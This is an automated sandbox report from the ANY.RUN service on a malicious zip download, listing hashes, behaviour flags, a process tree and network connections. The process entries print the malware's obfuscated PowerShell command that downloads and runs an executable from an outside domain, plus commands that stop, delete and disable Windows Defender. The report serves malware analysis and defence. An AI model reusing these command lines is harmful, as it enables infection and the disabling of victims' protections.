analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

https://doc-0o-5o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/jqip7vm7o6flmbaqghqt6amspc5b7i66/1558368000000/12685595860439926623/*/1CKwT-loVivwmNZy7sNT3Gg4W_hht__ZX?e=download

Full analysis: https://app.any.run/tasks/3b68f5be-4223-4efd-bbd3-db546b69d8bb
Verdict: Malicious activity
Analysis date: May 20, 2019, 17:09:00
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MD5:

CBFCD237FDAB4683C72FA7D9E9CC5BDC

SHA1:

E3D4A23736A6A91F0AEA7721C6B073108A245522

SHA256:

08BE69F1115FAAE727E4277CF205A021ACBA0E4E3987E0717265FB76336A05DF

SSDEEP:

6:2SfVvCGNHBTCezTp48Dy5m3853MUmomWM3DLI:2W6GNHBT5ztdGj3hRyE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3224)
      • cmd.exe (PID: 3880)
      • cmd.exe (PID: 2796)
    • Stops/Deletes Windows Defender service via SC.exe

      • cmd.exe (PID: 3144)
      • cmd.exe (PID: 2432)
      • cmd.exe (PID: 1728)
      • cmd.exe (PID: 1480)
      • cmd.exe (PID: 3720)
      • cmd.exe (PID: 1976)
      • cmd.exe (PID: 3696)
      • cmd.exe (PID: 2852)
    • Application was dropped or rewritten from another process

      • D.exe (PID: 1824)
      • D.exe (PID: 1532)
    • Disables Windows Defender Real-time monitoring

      • D.exe (PID: 1532)
    • Known privilege escalation attack

      • DllHost.exe (PID: 3132)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • WinRAR.exe (PID: 3676)
      • D.exe (PID: 1824)
      • D.exe (PID: 1532)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2744)
    • Creates files in the user directory

      • powershell.exe (PID: 2744)
      • powershell.exe (PID: 2008)
      • powershell.exe (PID: 2920)
      • powershell.exe (PID: 1396)
      • powershell.exe (PID: 1492)
    • Executes PowerShell scripts

      • cmd.exe (PID: 636)
      • cmd.exe (PID: 3608)
    • Executed via COM

      • DllHost.exe (PID: 3132)
  • INFO

    • Creates files in the user directory

      • iexplore.exe (PID: 2884)
    • Changes internet zones settings

      • iexplore.exe (PID: 3368)
    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 3368)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2884)
      • iexplore.exe (PID: 3368)
    • Changes settings of System certificates

      • iexplore.exe (PID: 3368)
    • Application launched itself

      • iexplore.exe (PID: 3368)
    • Reads settings of System Certificates

      • iexplore.exe (PID: 3368)
      • powershell.exe (PID: 2744)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
79
Monitored processes
33
Malicious processes
8
Suspicious processes
8

Behavior graph

Click at the process to see the details
start iexplore.exe iexplore.exe winrar.exe no specs cmd.exe no specs powershell.exe wordpad.exe no specs d.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs sc.exe no specs sc.exe no specs sc.exe no specs cmd.exe no specs cmd.exe no specs sc.exe no specs powershell.exe no specs CMSTPLUA no specs d.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe no specs sc.exe no specs cmd.exe no specs sc.exe no specs sc.exe no specs cmd.exe no specs cmd.exe no specs sc.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3368"C:\Program Files\Internet Explorer\iexplore.exe" https://doc-0o-5o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/jqip7vm7o6flmbaqghqt6amspc5b7i66/1558368000000/12685595860439926623/*/1CKwT-loVivwmNZy7sNT3Gg4W_hht__ZX?e=downloadC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2884"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3368 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3676"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ND52ZTUA\GFHN-939742306[1].zip"C:\Program Files\WinRAR\WinRAR.exeiexplore.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3224"C:\Windows\System32\cmd.exe" /C set o=HttPs:/&powershEll "$sd=new-object system.nEt.weBcliEnt;$sd.doWnloAdfIle($env:o+'/www.braintrainersuk.com/ONOLTDA-GD.exe',$env:tmp+'\D.exe');"&"C:\Program Files\wiNDows nt\accESsorIes\wORdpaD" c:\pagefIle.syS&C:\Users\admin\AppData\Local\Temp/d&J34HH&E34JSH_d+&dfC:\Windows\System32\cmd.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2744powershEll "$sd=new-object system.nEt.weBcliEnt;$sd.doWnloAdfIle($env:o+'/www.braintrainersuk.com/ONOLTDA-GD.exe',$env:tmp+'\D.exe');"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3352"C:\Program Files\wiNDows nt\accESsorIes\wORdpaD" c:\pagefIle.sySC:\Program Files\wiNDows nt\accESsorIes\wordpad.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Wordpad Application
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1824C:\Users\admin\AppData\Local\Temp/dC:\Users\admin\AppData\Local\Temp\D.execmd.exe
User:
admin
Company:
NVIDIA Corporation
Integrity Level:
MEDIUM
Description:
NVIDIA PTX JIT Compiler, Version 430.39
Version:
26.21.14.3039
3880"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $trueC:\Windows\System32\cmd.exeD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1728"C:\Windows\System32\cmd.exe" /c sc stop WinDefendC:\Windows\System32\cmd.exeD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
5
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2432"C:\Windows\System32\cmd.exe" /c sc delete WinDefendC:\Windows\System32\cmd.exeD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
5
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
2 643
Read events
2 233
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
14
Text files
10
Unknown types
6

Dropped files

PID
Process
Filename
Type
3368iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico
MD5:
SHA256:
3368iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3368iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF50AB3CB598DC942C.TMP
MD5:
SHA256:
3368iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF4E8347E081F0FFCE.TMP
MD5:
SHA256:
3368iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{01F6C0E9-7B22-11E9-A09E-5254004A04AF}.dat
MD5:
SHA256:
2744powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QMOF15WRK4WUG626CJWA.temp
MD5:
SHA256:
2884iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.datdat
MD5:CDEC36044A07FE345578DA4D5EA4830D
SHA256:873D146B05FAE57BB9DD400C3B10E8C0B06C708132A3E29F09D9554C40DD59C0
3676WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa3676.19037\GFHN-939742306.lnklnk
MD5:85A8FA36FD69CC6E89C4A416F4E26F4B
SHA256:9114C599DDA562EA12C491F0FE5175D9829466267CE1E2C366BC5EA0DCD1D6A4
2884iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ND52ZTUA\GFHN-939742306[1].zipcompressed
MD5:CC20EE2D4F351CF5313112C2E58417D4
SHA256:5C2773B4C5EE2FAE3361902923650888721A4D666375B68E9EDFE2006591F7F0
2008powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KWXW1CAXKRGOPC26LDRQ.temp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
3
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3368
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3368
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2884
iexplore.exe
172.217.22.33:443
doc-0o-5o-docs.googleusercontent.com
Google Inc.
US
whitelisted
2744
powershell.exe
68.66.248.28:443
www.braintrainersuk.com
A2 Hosting, Inc.
US
suspicious

DNS requests

Domain
IP
Reputation
doc-0o-5o-docs.googleusercontent.com
  • 172.217.22.33
shared
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
www.braintrainersuk.com
  • 68.66.248.28
malicious

Threats

No threats detected
No debug info